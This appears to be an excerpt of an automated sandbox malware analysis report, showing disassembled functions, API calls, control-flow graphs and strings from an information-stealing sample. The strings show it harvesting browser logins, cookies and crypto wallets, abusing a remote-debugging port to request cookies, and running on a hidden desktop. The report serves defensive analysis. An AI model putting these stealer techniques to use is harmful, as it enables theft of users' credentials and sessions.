                                                                                                                                                                                                                                                                            • Part of subcall function 0040ED20: memmove.MSVCRT(?,00000000,?,00000000,-00000001,?,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDA3
                                                                                                                                                                                                                                                                            • Part of subcall function 00406940: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,0040D83E,00000000,?,00000000), ref: 00406982
                                                                                                                                                                                                                                                                            • Part of subcall function 00406940: memmove.MSVCRT(?,?,?,00000000,?,0040D83E,00000000,?,00000000), ref: 004069AA
                                                                                                                                                                                                                                                                          • htons.WS2_32(00000000), ref: 00405B76
                                                                                                                                                                                                                                                                          • freeaddrinfo.WS2_32(00000000), ref: 00405B96
                                                                                                                                                                                                                                                                          • connect.WS2_32(?,00000002,00000010), ref: 00405BAB
                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,?,?,GET ,00000000,00420ACE,00000001), ref: 00405C38
                                                                                                                                                                                                                                                                          • closesocket.WS2_32(?), ref: 00405C45
                                                                                                                                                                                                                                                                          • WSACleanup.WS2_32 ref: 00405C4B
                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405CC2
                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405D29
                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405D95
                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405DFC
                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE), ref: 00405E6D
                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE), ref: 00405EE6
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405F75
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405FE3
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 0040604B
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 004060AD
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 0040610F
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00406171
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 004061D9
                                                                                                                                                                                                                                                                          • send.WS2_32(00000000,00000000,?,00000000), ref: 0040620B
                                                                                                                                                                                                                                                                          • recv.WS2_32(00000000,?,00001000,00000000), ref: 0040622A
                                                                                                                                                                                                                                                                          • rand.MSVCRT ref: 00406246
                                                                                                                                                                                                                                                                          • rand.MSVCRT ref: 00406252
                                                                                                                                                                                                                                                                          • rand.MSVCRT ref: 0040625E
                                                                                                                                                                                                                                                                          • rand.MSVCRT ref: 0040626A
                                                                                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 004062E7
                                                                                                                                                                                                                                                                          • WSACleanup.WS2_32 ref: 004062ED
                                                                                                                                                                                                                                                                            • Part of subcall function 00406B00: memcpy.MSVCRT(00000000,?,?,00000000,?,?,?,00000000,?,?,?,00406742,00000088,0042150A,00000000,?), ref: 00406B7A
                                                                                                                                                                                                                                                                          • send.WS2_32(00000000,00000000,00000000,00000000), ref: 004063F3
                                                                                                                                                                                                                                                                          • recv.WS2_32(00000000,00000000,00001000,00000000), ref: 00406465
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,00000000), ref: 004064A3
                                                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(?), ref: 004065BF
                                                                                                                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0042150A,00000000,?,00000000,00000005), ref: 0040671B
                                                                                                                                                                                                                                                                          • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00406763
                                                                                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 0040676A
                                                                                                                                                                                                                                                                          • WSACleanup.WS2_32 ref: 00406770
                                                                                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 004067C8
                                                                                                                                                                                                                                                                          • WSACleanup.WS2_32 ref: 004067CE
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040683D
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406894
                                                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 0040692E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • GET , xrefs: 00405BFC
                                                                                                                                                                                                                                                                          • HTTP/1.1Host: , xrefs: 00405C0B
                                                                                                                                                                                                                                                                          • {"id":1,"method":"Storage.getCookies"}, xrefs: 0040623C
                                                                                                                                                                                                                                                                          • Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 00405DCF
                                                                                                                                                                                                                                                                          • Sec-WebSocket-Version: 13, xrefs: 00405EB3
                                                                                                                                                                                                                                                                          • ws://, xrefs: 0040558E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ??3@$memcpy$Cleanupclosesocket$rand$memmovesend$memchrrecv$??2@Concurrency::cancel_current_taskStartup_invalid_parameter_noinfo_noreturnconnectfreeaddrinfogetaddrinfohtonsmemcmpsocket
                                                                                                                                                                                                                                                                          • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $GET $ws://${"id":1,"method":"Storage.getCookies"}
                                                                                                                                                                                                                                                                          • API String ID: 2888708447-1943833848
                                                                                                                                                                                                                                                                          • Opcode ID: 1df36d042cab634cffa96afa8ef0f025dcee86d70f5e52261c321231cb3b4a1f
                                                                                                                                                                                                                                                                          • Instruction ID: e4f2ee01d7335c5added529db0d38c8452bd00aeee575b7ecc144f5d552c7b4a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1df36d042cab634cffa96afa8ef0f025dcee86d70f5e52261c321231cb3b4a1f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3C2D3706087808BD734DB28C894BAFB7E1AF85318F14093EF596AB3C1D7799844CB5A
                                                                                                                                                                                                                                                                          Function 004081B0 Relevance: 80.1, APIs: 17, Strings: 28, Instructions: 1338stringfileCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 928 4081b0-408273 call 410530 ExpandEnvironmentStringsA call 410240 call 4101c0 call 4102e0 call 410340 call 410290 call 410230 * 2 call 4101c0 * 2 call 410530 FindFirstFileA 951 408279-408298 928->951 952 4093da-40944f call 410230 * 12 928->952 953 4082cd-408308 call 402400 951->953 988 409452-409457 _invalid_parameter_noinfo_noreturn 952->988 960 40830a-408319 strlen 953->960 961 40831b-40832a 953->961 960->961 962 408360-408364 961->962 963 40832c-408333 961->963 967 408437-408449 962->967 968 40836a-408392 call 402400 962->968 965 408335 963->965 966 40833b-40834e memcmp 963->966 965->966 966->968 970 408350-408352 966->970 972 408491-408493 967->972 973 40844b-40845d 967->973 985 408394-4083a5 strlen 968->985 986 4083a7-4083a9 968->986 970->968 977 408354-408356 970->977 975 4082b2-4082c7 FindNextFileA 972->975 976 408499-408502 call 410240 call 4102e0 call 410340 * 2 call 410290 call 410230 * 3 972->976 979 408488-40848e ??3@YAXPAX@Z 973->979 980 40845f-408461 973->980 975->953 987 4093cb-4093d7 975->987 1038 408504-40851d call 410530 StrCmpCA 976->1038 1039 408527-40855f call 410340 * 3 976->1039 977->967 984 40835c 977->984 979->972 980->988 989 408467-40846c 980->989 984->968 992 4083af-4083bb 985->992 986->992 987->952 989->988 993 408472-408477 989->993 998 4083d8-4083df 992->998 999 4083bd-4083c4 992->999 993->988 994 40847d-408480 993->994 994->988 1000 408486 994->1000 1001 4083e1-4083e4 998->1001 1002 4083e7-4083f2 998->1002 1005 4083c6 999->1005 1006 4083c9-4083d6 memcmp 999->1006 1000->979 1001->1002 1002->967 1007 4083f4-408403 1002->1007 1005->1006 1006->998 1006->1002 1010 408405-408407 1007->1010 1011 40842e-408434 ??3@YAXPAX@Z 1007->1011 1010->988 1014 40840d-408412 1010->1014 1011->967 1014->988 1017 408418-40841d 1014->1017 1017->988 1020 408423-408426 1017->1020 1020->988 1023 40842c 1020->1023 1023->1011 1044 408561 1038->1044 1045 40851f-408525 1038->1045 1053 40859c-4085e3 call 410340 call 410290 call 410230 * 4 call 410530 1039->1053 1047 408564-408596 call 410340 * 3 1044->1047 1045->1047 1047->1053 1073 4087f0-408804 1053->1073 1074 4085e9-4085fd 1053->1074 1077 40880a-408818 1073->1077 1078 40894f-4089f6 call 410200 * 7 call 407dd0 1073->1078 1074->1073 1079 408603-40871a call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 * 2 call 4101c0 call 410340 * 2 call 410290 call 410230 * 2 call 410200 call 4076b0 1074->1079 1085 408b08-408b23 call 410530 1077->1085 1086 40881e-408838 call 410200 call 411520 1077->1086 1174 4089fb 1078->1174 1390 408720-4087b3 call 410200 * 5 call 413e50 call 410230 1079->1390 1391 4087b8-4087ed call 410530 call 4104e0 call 410530 call 410230 * 2 1079->1391 1108 408a00-408a07 1085->1108 1109 408b29-408b2f 1085->1109 1104 408d30-408d44 1086->1104 1105 40883e-408844 1086->1105 1131 408ff3-4090c0 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 * 2 CopyFileA call 410200 call 4076b0 1104->1131 1132 408d4a-408d58 1104->1132 1105->1108 1110 40884a-408857 1105->1110 1114 4082a0-4082ad call 4104e0 * 2 1108->1114 1115 408a0d-408afb call 410200 * 4 call 4101c0 call 410200 * 4 call 4081b0 1108->1115 1109->1108 1113 408b35-408b42 1109->1113 1116 408f24-408fee memset call 410530 * 4 call 410200 * 4 1110->1116 1117 40885d-40886b 1110->1117 1122 408b48-408b56 1113->1122 1123 4092ad-40937f memset call 410530 * 5 call 410200 * 4 1113->1123 1114->975 1271 408b00-408b03 1115->1271 1303 409385-409397 call 407110 1116->1303 1117->975 1127 408871-40890d call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 1117->1127 1122->975 1134 408b5c-408be7 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 1122->1134 1123->1303 1333 408910-40891f call 410530 1127->1333 1359 4090c5-4090c9 1131->1359 1132->1108 1158 408d5e-408e10 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 * 2 CopyFileA 1132->1158 1321 408bf0-408c13 call 410530 * 2 1134->1321 1355 408e16-408e32 call 410200 call 4076b0 1158->1355 1356 408f19-408f1f 1158->1356 1182 4089fd 1174->1182 1182->1108 1271->1114 1316 40939c-40939e 1303->1316 1316->1182 1357 408c15-408c39 call 410200 call 411d20 Sleep 1321->1357 1358 408c4a-408c75 call 410200 call 4076b0 1321->1358 1352 408925-40894d call 410200 call 411d20 call 410530 1333->1352 1353 4091cd-4091f8 call 410200 call 4076b0 1333->1353 1352->1333 1395 4093a3-4093a5 1353->1395 1396 4091fe-4092a8 call 410340 call 410200 * 4 call 413e50 call 410230 1353->1396 1392 408e37-408e3b 1355->1392 1362 4091b0-4091bc call 410530 DeleteFileA call 4104e0 1356->1362 1357->1321 1394 408c3b-408c45 call 410290 1357->1394 1398 4093b8 1358->1398 1399 408c7b-408d2b call 410340 call 410200 * 4 call 413e50 call 410230 1358->1399 1367 4091a4-4091aa 1359->1367 1368 4090cf-40919f call 410340 call 4102e0 call 410340 call 410200 * 4 call 413e50 call 410230 * 3 1359->1368 1401 4091c1-4091c8 call 410230 1362->1401 1367->1362 1368->1367 1390->1391 1391->1073 1404 408e41-408f0e call 410340 call 4102e0 call 410340 call 410200 * 4 call 413e50 call 410230 * 3 1392->1404 1405 408f13 1392->1405 1394->1358 1414 4093ac-4093b3 call 410230 1395->1414 1396->1414 1407 4093bf-4093c6 call 410230 1398->1407 1399->1407 1401->1182 1404->1405 1405->1356 1407->975 1414->975
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104), ref: 004081D9
                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,0042150A,0042150A,?,?,0042119A,?,?,0042150A,?), ref: 00408268
                                                                                                                                                                                                                                                                            • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,?,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00408311
                                                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00408344
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040839B
                                                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 004083CC
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040842F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: memcmpstrlen$??3@EnvironmentExpandFileFindFirstStringsmemmove
                                                                                                                                                                                                                                                                          • String ID: --remote-debugging-port=9223 --profile-directory="$Brave$C:\ProgramData\$CURRENT$Cookies$History$IndexedDB$Local Extension Settings$Login Data$Network$Opera$Opera Crypto$Opera GX$Sync Extension Settings$Wallets$Web Data$\BraveWallet\Preferences$_0.indexeddb.leveldb$_cookies.db$_formhistory.db$_history.db$_key4.db$_logins.json$_webdata.db$chrome-extension_$cookies.sqlite$formhistory.sqlite$places.sqlite
                                                                                                                                                                                                                                                                          • API String ID: 584679816-3644845557
                                                                                                                                                                                                                                                                          • Opcode ID: 8c4c13cee421c7050bc34002db25b6abb8c2bc4e772ac01028f81aeeca01f54a
                                                                                                                                                                                                                                                                          • Instruction ID: 4855d12272032d1875a7082c41d92aaf51c32be0ad940928e656d1a7aac375ca
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c4c13cee421c7050bc34002db25b6abb8c2bc4e772ac01028f81aeeca01f54a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FB2A331A006199BCB10EFA1CD95AEEB779BF48304F40419EF8056B192DF78AEC5CB95
                                                                                                                                                                                                                                                                          Function 00413FF0 Relevance: 54.9, APIs: 23, Strings: 8, Instructions: 667stringfileCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 1577 413ff0-41405d call 41e9b0 FindFirstFileA memset * 2 1581 4146b1-4146d7 call 410230 * 4 1577->1581 1582 414063-414081 1577->1582 1608 4146da-4146e2 call 410230 1581->1608 1583 4140ae-4140e2 call 402400 1582->1583 1589 414100 1583->1589 1590 4140e4-4140ef strlen 1583->1590 1593 414102-414111 1589->1593 1590->1593 1595 414150-414154 1593->1595 1596 414113-414120 1593->1596 1598 414245-414251 1595->1598 1599 41415a-41418e call 402400 1595->1599 1600 414122 1596->1600 1601 414128-414135 memcmp 1596->1601 1604 414253-414265 1598->1604 1605 414299-41429b 1598->1605 1616 414190-4141a1 strlen 1599->1616 1617 4141a3 1599->1617 1600->1601 1601->1599 1606 414137-414139 1601->1606 1610 414290-414296 ??3@YAXPAX@Z 1604->1610 1611 414267-414269 1604->1611 1612 4142a1-4142d6 1605->1612 1613 414090-4140a8 FindNextFileA 1605->1613 1606->1599 1607 41413b-41413d 1606->1607 1607->1598 1614 414143 1607->1614 1608->1581 1610->1605 1619 4146e4-41474f _invalid_parameter_noinfo_noreturn call 410530 * 2 GetLogicalDriveStringsA 1611->1619 1620 41426f-414274 1611->1620 1636 4142d8-4142ed 1612->1636 1637 4142ef-414306 1612->1637 1613->1583 1618 4146a8 1613->1618 1614->1599 1623 4141a5-4141b4 1616->1623 1617->1623 1618->1581 1654 414755-414785 1619->1654 1655 414a0e-414a68 call 410230 * 8 1619->1655 1620->1619 1625 41427a-41427f 1620->1625 1626 4141e0-4141e7 1623->1626 1627 4141b6-4141c3 1623->1627 1625->1619 1629 414285-414288 1625->1629 1634 4141e9-4141ec 1626->1634 1635 4141ef-4141fd 1626->1635 1631 4141c5 1627->1631 1632 4141cb-4141de memcmp 1627->1632 1629->1619 1633 41428e 1629->1633 1631->1632 1632->1626 1632->1635 1633->1610 1634->1635 1635->1598 1639 4141ff-414211 1635->1639 1648 414309-414335 memset 1636->1648 1637->1648 1640 414213-414215 1639->1640 1641 41423c-414242 ??3@YAXPAX@Z 1639->1641 1640->1619 1643 41421b-414220 1640->1643 1641->1598 1643->1619 1647 414226-41422b 1643->1647 1647->1619 1649 414231-414234 1647->1649 1656 414340-41434a strtok_s 1648->1656 1649->1619 1652 41423a 1649->1652 1652->1641 1657 414790-4148e8 memset GetDriveTypeA call 410530 call 4119b0 lstrcpyA call 410530 * 3 call 410200 * 4 call 413ff0 1654->1657 1659 414370-41439a memset 1656->1659 1660 41434c-41435e 1656->1660 1733 4148ed-414900 lstrlenA 1657->1733 1669 4143c8-4143d2 strtok_s 1659->1669 1667 4145a0-4145a7 1660->1667 1668 414364-41436c 1660->1668 1667->1613 1672 4145ad-4145b9 1667->1672 1668->1656 1669->1667 1673 4143d8-4143e2 1669->1673 1672->1618 1677 4145bf-4145c6 1672->1677 1682 4143e4-4144b9 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 DeleteFileA call 410530 CopyFileA call 410530 call 411b80 call 41e900 1673->1682 1683 4143bd-4143c6 1673->1683 1677->1613 1681 4145cc-41469b call 410200 * 4 call 413ff0 1677->1681 1720 4146a0-4146a3 1681->1720 1754 4143a0-4143b7 call 410530 call 410230 1682->1754 1755 4144bf-4144ce 1682->1755 1683->1669 1720->1613 1733->1657 1735 414906 1733->1735 1735->1655 1754->1683 1755->1608 1756 4144d4-4144f0 call 410200 call 4076b0 1755->1756 1763 4144f5-4144fc 1756->1763 1765 414502-414592 call 4101c0 call 410200 * 4 call 413e50 call 410230 1763->1765 1766 414597-41459e call 410230 1763->1766 1765->1766 1766->1667
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,-000000C0,-000000CC,-000000D8), ref: 00414023
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00414039
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0041404F
                                                                                                                                                                                                                                                                            • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,?,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004140E5
                                                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,00000000,00000000), ref: 0041412B
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00414197
                                                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002), ref: 004141D4
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002), ref: 0041423D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: memcmpmemsetstrlen$??3@FileFindFirstmemmove
                                                                                                                                                                                                                                                                          • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$%s\%s\%s$%s\*.*$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$C:\ProgramData\$Files
                                                                                                                                                                                                                                                                          • API String ID: 2257844457-1484801792
                                                                                                                                                                                                                                                                          • Opcode ID: 85359c954f35e407cbf01df20d7615a727ed75f97d4295e79f40369c1520ae8c
                                                                                                                                                                                                                                                                          • Instruction ID: 5e360f460fbcca21e162eb574f6fd90f09ecfb201c8315115846ffce7b56cf4e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85359c954f35e407cbf01df20d7615a727ed75f97d4295e79f40369c1520ae8c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB42D471E00618ABDB10DF65CC85BEEB7B4BF58304F00419AF915A7252EB78AAC4CF94
                                                                                                                                                                                                                                                                          Function 00407060 Relevance: 38.9, APIs: 16, Strings: 6, Instructions: 448stringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 2343 407060-407087 2344 407096 2343->2344 2345 407089-407094 strlen 2343->2345 2346 407098-40709d 2344->2346 2345->2346 2347 4070d6-4070e8 call 40f390 2346->2347 2348 40709f-4070a2 2346->2348 2356 4070f5 2347->2356 2357 4070ea-4070f3 strlen 2347->2357 2349 4070a4-4070a9 2348->2349 2350 407109-40714a call 402510 memcpy OpenDesktopA 2348->2350 2353 4070b5-4070c0 call 40eca0 2349->2353 2354 4070ab-4070b3 call 402520 2349->2354 2363 40716c-40721f call 407660 call 411550 call 410530 call 4119b0 call 410230 call 411fa0 2350->2363 2364 40714c-407166 CreateDesktopA 2350->2364 2353->2347 2367 4070c2-4070c8 2353->2367 2354->2367 2361 4070f7-407106 call 406b00 2356->2361 2357->2361 2384 407221-40722a strlen 2363->2384 2385 40722c 2363->2385 2364->2363 2370 4070ca 2367->2370 2371 4070cc-4070d3 2367->2371 2370->2371 2371->2347 2386 40722e-40723f call 402400 2384->2386 2385->2386 2389 407264-40726c call 406fe0 2386->2389 2392 40727b-407283 2389->2392 2393 40726e-407274 2389->2393 2396 407285-407294 2392->2396 2397 4072c8-4072e5 2392->2397 2394 407250-407262 call 411fa0 2393->2394 2395 407276-407279 2393->2395 2394->2389 2394->2392 2395->2394 2399 407296-407298 2396->2399 2400 4072bf-4072c5 ??3@YAXPAX@Z 2396->2400 2398 407303-40734c CreateProcessA 2397->2398 2402 4074c2-4074df 2398->2402 2403 407352-40738b Sleep call 410200 2398->2403 2404 40764d-407652 _invalid_parameter_noinfo_noreturn 2399->2404 2405 40729e-4072a3 2399->2405 2400->2397 2408 4074e1-4074e7 strlen 2402->2408 2409 4074ea-40750f call 402400 call 406b00 2402->2409 2412 407390-4073ec call 410200 * 3 call 406bc0 2403->2412 2405->2404 2410 4072a9-4072ae 2405->2410 2408->2409 2423 407511-40751a strlen 2409->2423 2424 40751c-407559 call 406b00 * 2 call 4101c0 2409->2424 2410->2404 2414 4072b4-4072b7 2410->2414 2434 4073f2-407412 call 411fa0 2412->2434 2435 40760c-40760f call 412050 2412->2435 2414->2404 2417 4072bd 2414->2417 2417->2400 2423->2424 2441 40755b 2424->2441 2442 40755e-4075d3 call 4101c0 * 2 call 410200 * 4 call 402910 2424->2442 2443 407420 2434->2443 2444 407414-40741d strlen 2434->2444 2440 407614-40761d CloseDesktop 2435->2440 2445 407622-40764a call 410230 * 4 2440->2445 2441->2442 2489 4075d5-4075e4 2442->2489 2490 407608-40760a 2442->2490 2447 407422-407430 call 402400 2443->2447 2444->2447 2457 407454-40745c call 406fe0 2447->2457 2466 407470-407479 2457->2466 2467 40745e-407464 2457->2467 2470 4072f9-4072fd 2466->2470 2471 40747f-40748e 2466->2471 2473 407440-407452 call 411fa0 2467->2473 2474 407466-407469 2467->2474 2470->2398 2470->2440 2476 4072f0-4072f6 ??3@YAXPAX@Z 2471->2476 2477 407494-407496 2471->2477 2473->2457 2473->2466 2474->2473 2476->2470 2477->2404 2480 40749c-4074a1 2477->2480 2480->2404 2483 4074a7-4074ac 2480->2483 2483->2404 2485 4074b2-4074b5 2483->2485 2485->2404 2488 4074bb-4074bd 2485->2488 2488->2476 2491 4075e6-4075e8 2489->2491 2492 4075ff-407605 ??3@YAXPAX@Z 2489->2492 2490->2445 2491->2404 2493 4075ea-4075ef 2491->2493 2492->2490 2493->2404 2494 4075f1-4075f6 2493->2494 2494->2404 2495 4075f8-4075fb 2494->2495 2495->2404 2496 4075fd 2495->2496 2496->2492
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040708A
                                                                                                                                                                                                                                                                            • Part of subcall function 0040ECA0: memcpy.MSVCRT(?,00000010,?,?,?,00000010,00406A4D,00000001,00000000,?,?,00000000,00000000,00000000,?,0040D83E), ref: 0040ECC1
                                                                                                                                                                                                                                                                            • Part of subcall function 0040ECA0: ??3@YAXPAX@Z.MSVCRT(00000010,?,?,00000010,00406A4D,00000001,00000000,?,?,00000000,00000000,00000000,?,0040D83E,00000000,?), ref: 0040ECF3
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004070EB
                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,ChromeBuildTools,00000104), ref: 00407130
                                                                                                                                                                                                                                                                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00407142
                                                                                                                                                                                                                                                                          • CreateDesktopA.USER32 ref: 00407166
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00407222
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
